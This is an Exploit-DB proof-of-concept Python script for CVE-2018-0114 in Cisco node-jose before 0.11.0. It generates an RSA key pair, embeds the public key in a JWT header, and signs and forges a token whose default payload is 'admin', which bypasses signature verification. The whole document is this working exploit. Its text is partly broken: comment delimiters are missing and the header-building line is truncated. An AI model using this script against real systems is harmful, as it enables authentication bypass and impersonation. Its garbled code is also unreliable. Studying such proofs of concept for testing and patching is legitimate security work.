#!/usr/bin/env python3
import base64
from urllib.parse import quote_plus
import rsa
import sys
EDB Note: This has been updated ~ https://github.com/offensive-security/exploitdb/pull/139
POC of CVE-2018-0114 Cisco node-jose <0.11.0
Example: python3 44324.py "mypayload" 512
Created by Andrea Cappa aka @zi0Black (GitHub,Twitter,Telegram)
Enhanced for python3 by github.com/eshaan7
Mail: a.cappa@zioblack.xyz
Site: https://zioblack.xyz
A special thanks to Louis Nyffenegger, the founder of PentesterLab, for all the help he provided to allow me to write this script.
Mail: louis@pentesterlab.com
Site: https://pentesterlab.com
def generate_key(key_size):
#create rsa priv & public key
print ("[+]Creating-RSA-pair-key")
(public_key,private_key) = rsa.newkeys(key_size,poolsize=8)
print ("\t[+]Pair-key-created")
return private_key, public_key
def pack_bigint(i):
b = bytearray()
while i:
b.append(i & 0xFF)
i >>= 8
return b[::-1]
def generate_header_payload(payload,pubkey):
#create header and payload
print ("[+]Assembling-the-header-and-the-payload")
headerAndPayload = base64.b64encode(('{"alg":"RS256",'
headerAndPayload = headerAndPayload+b"."+base64.b64encode(payload)
headerAndPayload = headerAndPayload
print ("\t[+]Assembed")
return headerAndPayload
def generate_signature(firstpart,privkey):
#create signature
signature = rsa.sign(firstpart,privkey,'SHA-256')
signatureEnc = base64.b64encode(signature)
print ("[+]Signature-created")
return signatureEnc
def create_token(headerAndPayload,sign):
print ("[+]Forging-of-the-token\n\n")
token = (headerAndPayload+b"."+sign).decode('utf-8').rstrip('=')
token = quote_plus(token)
return token
payload = bytes(str(sys.argv[1]).encode('ascii'))
key_size = int(sys.argv[2])
payload = b'admin'
key_size = int(512)
__________________ _____________ __ __
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| | \ \/ /| |__ ______ ) | | | | || | | (_) |______| | | || || | | || |_
| |\ \/ / |__| |______| / /| | | || |> _ <|______| | | | || || | |__ _|
| |____ \/| |____/ /_| |_| || | | (_) || |_| || || || |
\_____| \/ |______||____|\___/ |_|\___/\___/ |_||_||_|by @zi0Black
if __name__ == '__main__':
print (banner)
(privatekey,publickey) = generate_key(key_size)
firstPart = generate_header_payload(payload,publickey)
signature = generate_signature(firstPart,privatekey)
token = create_token(firstPart,signature)